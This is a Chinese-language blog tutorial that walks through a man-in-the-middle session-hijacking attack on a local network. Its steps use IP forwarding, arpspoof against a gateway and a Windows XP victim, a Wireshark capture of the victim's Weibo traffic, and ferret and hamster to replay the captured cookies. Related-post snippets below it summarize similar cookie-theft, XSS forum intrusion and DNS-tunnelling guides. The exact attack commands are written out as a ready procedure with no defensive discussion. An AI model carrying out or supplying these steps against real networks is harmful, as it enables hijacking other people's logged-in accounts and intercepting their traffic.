kali攻防第3章 内网称霸之Cookie截取

最新推荐文章于 2024-08-12 20:00:00 发布
置顶 最新推荐文章于 2024-08-12 20:00:00 发布
阅读量9.7k 收藏 27
点赞数 2
分类专栏: 安全攻防之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/strom2418/article/details/50039645
版权

内网称霸之Cookie截取

 

准备工具

 

1、一台KALI_LINUX系统

2、一台被攻击的windows系统

 

网络环境

 

Kali系统IP  10.10.10.131

Windows xp IP 10.10.10.129

 

使用的工具

 

arpspoof   -->欺骗工具 

 

wireshark -->抓包工具  

 

 

开始执行步骤

 

1、root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward

2、arpspoof -i eth0 -t 10.10.10.2 10.10.10.129

3、使用wireshark进行抓包

 

 

 

4、受害者10.10.10.129打开微博

 

5、停止抓包工具并保存抓包数据为pcap格式,保存名字为cookie

 

 

6、使用 ferret工具

如果没有这个工具请使用命令

ferret没有64位的

可以安装32位的

1)添加对32位的支持

dpkg --add-architecture i386

2)更新

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

3)安装ferret

sudo aptitude install ferret-sidejack:i386

 

4)ferrer -r cookie.pacp

 

 

7、生成hamster.txt文件,进行架设代理服务器

root@kali:~# hamster 

--- HAMPSTER 2.0 side-jacking tool ---

Set browser to use proxy http://127.0.0.1:1234

DEBUG: set_ports_option(1234)

DEBUG: mg_open_listening_port(1234)

Proxy: listening on 127.0.0.1:1234

begining thread

 

8、打开10.10.10.131系统中的游览器,设置代理服务地址和端口并关闭arp欺骗

 

 

 

 

9、分析hamster信息一条一条进行

 

 


随行之旅
关注
专栏目录
Linux-Kali下抓取cookie笔记 往事如风~
weixin_36135166的博客
05-03 1034
Linux-Kali下抓取cookie笔记 首先给大家说下 这个也属于传统中间人攻击,由于中间人攻击可以使用多种方法,就不一一说了,这里只介绍 利用kali下工具来劫持cookie信息。1 首先kali要连接到这个网络 可以用ifconfig 查看IP地址是否获取,可以ping www.baidu.com 来检测设备的连通性。(eth0就是你第一个网网卡 loopback是本地环回地址)2 如果不...
[Kali Linux]入门:内网穿透的教程和实战(很适合入门|附图)
MSB_WLAQ的博客
10-07 5293
hello 各位freebuf的铁铁,我是白面安全猿,我又来发表文了。因为最近有好多网友问我关于内网穿透的事情,所以打算写一篇教程尽量教会各位刚入门kali的新手和没有具体了解过内网穿透的老手内网穿透! 我这个人也不喜欢搞什么花里胡少的东西,原理我就不多说了,说了新手理解起来比较吃力,都是从那一步来的都知道。如果想要具体去了解内网穿透原理的话可以去看看其他博主的文。 首先想要内网穿透的话必须先要用到内网穿透的工具,很多第三方都提供了内网穿透的工具,比如花生壳啊或者飞鸽啊等等,那么我这里推荐一下sun
Kali Linux系列之cookie抓取
微信公众号:码奋
04-13 2828
​ (你的世界是个什么样的世界?你说,我们倾听!) ----------------- cookie包抓取 小百科 Cookie,有时也用其复数形式Cookies,指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)。定义于RFC2109和2965中的都已废弃,最新取代的规范是RFC6265[1]。(可以叫做浏览器缓存)...
Kali Linux:网络与安全专家的终极武器,2024年最新阿里程序员的Linux运维之路
最新发布
ZL_1618的博客
08-12 812
本书将通过分析黑客采用的攻击战术来提升测试者的渗透测试技能:通过实验室集成到云服务,从而了解在渗透测试中通常被忽略的一个开发维度;探索在虚拟机和容器化环境中安装和运行KaliLinux的不同方法,以及使用容器在AWS上部署易受攻击的云服务,利用配置错误的S3桶来访问EC2实例;深入研究被动和主动侦察,从获取用户信息到大规模端口扫描,在此基础上,探索了不同的脆弱性评估,包括威胁建模;讲述了如何在受损系统上使用横向移动、特权升级以及命令与控制(C2);
渗透之cookie截取
爱码农爱生活
03-12 797
网上关于XSS入侵网站的例子很多,但是大多都是一些恶作剧性质的介绍.下面本人来亲自介绍下利用脚本入侵国内某安全论坛的过程   就像主题所说一样,今天测试的论坛是DISCUZ! 6.1.0   目标:卡巴技术论坛 http://kpchina.net http://bbs.kpchina.net   工具:无(感觉本人的入侵方式不是很高级,低调,所以不用工具,需要的东西自己写,都是脚本哦~!...
Kali-用户Cookie信息并实现无账号登录
icbug
06-06 2030
大家一定都经历过进入不良网站吧 这种网站一般都含有xss的攻击代码,只不过是被打了伪装而已 本就会为大家介绍一下,这其中到底暗藏着什么玄机 首先我们需要一个DVWA靶机 搭建教程:https://icbugblog.cn/archives/8/ 注意:这个教程涉及到mariadb需要自己创建一个新的用户才可以使用 搭建好靶场后我们开始我们的教程 首先我们先把DVWA的安全等级调为Low,方便我们开始XSS的基础学习 反向XSS的原理 我们来演示一下它的工作原理。这个功能类似一个留言板,输入信息后.
Kali Linux Web渗透测试手册(第二版) - 2.7 - 获取和修改cookie
weixin_30609287的博客
11-29 200
标记红色的部分为今日更新内容。 第二:侦察 介绍 2.1、被动信息收集 2.2、使用Recon-ng收集信息 2.3、使用Nmap扫描和识别应用服务 2.4、识别web应用防火墙 2.5、识别HTTPS加密参数 2.6、使用浏览器自带的开发工具来做基本的分析和修改 2.7、获取和修改cookie 2.8、利用robots.txt 2.7、获取...
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-21
内网安全攻防是网络安全领域中的重要组成部分,它涉及到企业、机构等组织内部网络的保护,防止未经授权的访问、攻击和信息泄露。本篇知识分享主要讲解了如何利用SSH隧道进行内网的安全穿越,即内网安全攻防中的端口...
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试等
B站kali前5笔记.zip
03-14
第三将深入到Kali Linux中的网络扫描工具,如Nmap,它是网络发现和端口扫描的经典工具。通过学习Nmap,你可以了解网络拓扑结构,找出活动主机,探测服务及其版本信息。此外,还有可能讲解了其他扫描工具,如...
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南 内网安全攻防渗透测试实战指南是指在内网中进行的渗透测试实战指南,旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法。 内网安全攻防渗透测试实战指南主要包含...
E022-渗透测试常用工具-使用ferret进行Cookie劫持.pdf
12-02
E022-渗透测试常用工具-使用ferret进行Cookie劫持
Kali Linux 实现Cookie会话劫持
bomb324的博客
09-05 1762
一.环境搭建 Tips: 使用Kali Linux,下列工具中只需要下载ferret即可,其它工具均默认安装 1.下载arpspoof apt install dsniff 2.下载ferret 软件介绍: 网络数据包传递用户的各种操作和对应的信息。但是由于各种数据混在一起,不利于渗透测试人员分析。Kali Linux提供了一款信息搜集工具ferret-sidejack。该工具既可以从网络接口直接读取数据,也可以读取数据抓包文件。该工具会过滤掉大部分格式性数据,只保留更为有价值的数据,如IP地址、Mac
kali linux中使用ferret进行cookies劫持攻击
weixin_43996007的博客
01-17 3569
kali linux中使用ferret进行cookies劫持攻击 首先将kali linux的网卡模式设置为“仅主机模式”,使其共享物理主机的网络,并且可以上外网。 在kali中,开启数据转发功能,并查看当前的ip地址。 使用nmap或者zenmap扫描局域网内的主机,确定攻击目标 使用arpspoof命令冒充网关 arpspoof -i eth0 -t 网关 目标主机 ...
(原创)kali linux下劫持百度和QQ空间cookie
12-24 4310
下载链接请看下方 链接:http://pan.baidu.com/s/1nt1GCbR 密码:dets
内网渗透之cookie的获取
D-R0s1的博客
07-18 2825
                                             内网渗透                                                                         ——cookie的获取         今天给大家分享的实验仍然是内网渗透的系列,对于kali linux的初学者,想必实实在在的实验比那些大段的...
HTTP cookies劫持实验
m0_51498031的博客
04-23 2459
1、首先保证虚拟机中的kali系统能够和外部网络通信,查看设置----虚拟网络编辑器----桥接无线网卡-------kali编辑网络设置为DHCP自动获取地址,设置完后重新激活ifconfig命令查看IP: 2、安装攻击工具 dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386 apt-get install hamster-sid.
Cookie获取实验总出错,Hamster,Ferret工具遇到错误?这篇文一次全搞定!
qq_39616910的博客
04-12 2484
1工具准备 中间人攻击获取cookie登陆他人账号,需要工具: 1.1arpspoof 用于中间人攻击,ARP欺骗 1.2ferret 用于重写生成后的抓包文件 该工具安装方 实验使用2017年64位kali,没有安装ferret工具,首先要进行安装 1.2.1添加对32位的支持 dpkg --add-architecture i386 1.2.2 更新源 apt-get c...
中间人攻击劫持cookie
ChenD的学习笔记
10-26 1128
中间人攻击劫持cookie
DNS隧道攻防内网安全实战与检测
"这篇内容是关于内网安全攻防的分享,特别关注DNS隧道的利用与防御,适合安全运维人员学习。文中详细介绍了如何利用powercat工具构建DNS隧道,进行内网穿透,以及如何在Kali Linux上设置dnscat2服务端进行监控。" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

随行之旅

python国产化自动化

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值